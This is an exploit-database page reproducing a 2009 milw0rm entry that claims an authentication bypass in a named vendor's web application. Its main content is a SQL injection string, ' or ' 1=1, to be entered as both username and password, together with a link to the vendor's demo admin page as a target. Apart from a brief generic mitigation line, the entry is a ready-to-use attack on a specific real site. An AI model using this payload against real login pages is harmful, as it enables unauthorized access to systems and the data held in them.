header-logo
Suggest Exploit
vendor:
N/A
by:
SuB-ZeRo (WaLiD)
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Exploit Auth Bypass

This exploit allows an attacker to bypass authentication by entering ' or ' 1=1 as the username and password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

* Founded By : SuB-ZeRo (WaLiD)

* E-mail : Fbh@hotmail.com

* Home : WwW.dz-security.Net

* GreeTZ : Evils-dz & X.CJP.x & www.dz-security.net & gaza

---------------------------------------------------------

vondor : http://icash.ch

---------------------------------------------------------

Exploit Auth Bypass:



login: ' or ' 1=1

passw: ' or ' 1=1

----------------------------------------------------------

-[!]

Demo :

http://icash.ch/ClickAndEmailDemo/admin.asp

----------------------------------------------------------

# milw0rm.com [2009-01-18]

Navigation

Suggest Exploit

Services By CQR